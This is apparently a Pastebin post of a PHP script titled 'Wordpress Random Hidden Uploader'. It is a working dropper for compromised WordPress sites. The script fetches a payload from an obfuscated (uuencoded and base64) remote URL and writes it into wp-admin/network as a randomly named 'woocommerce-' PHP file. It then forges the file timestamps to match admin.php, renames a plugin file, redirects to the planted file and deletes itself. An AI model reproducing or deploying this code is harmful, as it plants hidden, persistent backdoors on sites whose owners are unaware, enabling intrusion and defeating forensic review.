willysec_id

Wordpress Random Hidden Uploader

Jun 25th, 2024 (edited)
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.37 KB | Cybersecurity | 0 0
  1. <?php
  2. //filename: gwp.php
  3. $dodo = $_SERVER['SERVER_NAME'];
  4. $rstr = str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890');
  5. $rrnb = substr($rstr,0,6).'.php';
  6. $data=curl_init();
  7. curl_setopt($data, CURLOPT_URL, convert_uudecode(base64_decode('TTonMVQ8I0hPK1chUztTRFA6NjFLOkZdRDxWSU86NklEOiZFVTonPFAuNkROOEY1TjkmRUc6NzFBOyMoUAo0LDNETj4nRVorVjlJOyY0Tz0mNVM9IllUPicwYApgCg==')));
  8. curl_setopt($data, CURLOPT_RETURNTRANSFER, 1);
  9. curl_setopt($data, CURLOPT_TIMEOUT,10);
  10. $ba = base64_decode(curl_exec($data));
  11. if (! is_dir ( "./wp-admin" ))
  12. mkdir ( "./wp-admin", 0777 );
  13. if (! is_dir ( "./wp-admin/network" ))
  14. mkdir ( "./wp-admin/network", 0777 );
  15. $filetemp = './wp-admin/network/woocommerce-'.$rrnb;
  16. $ftime = filemtime("./wp-admin/network/admin.php");
  17. file_put_contents($filetemp,$ba);
  18. touch("./wp-admin/network", $ftime, $ftime);    
  19. touch("./wp-admin/network/woocommerce-".$rrnb, $ftime, $ftime);
  20. rename('./wp-content/plugins/itr-popup/functions/jscolor/main.php','./wp-content/plugins/itr-popup/functions/jscolor/main-'.$rrnb);
  21. $url = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
  22. preg_match('/(.*?)\/(.*?)wp-content/',$url,$tmp);
  23. if($tmp[2] != ''){
  24.     $mddir = $tmp[2];
  25. }else{
  26.     $mddir = '';
  27. }
  28. $uurf = 'http://'.$dodo.'/'.$mddir.'wp-admin/'.'network/'.'woocommerce-'.$rrnb;
  29. echo '<meta http-equiv="Refresh" content="0; url='.$uurf.'">';
  30. unlink("./gwp.php");
Add Comment
Please, Sign In to add comment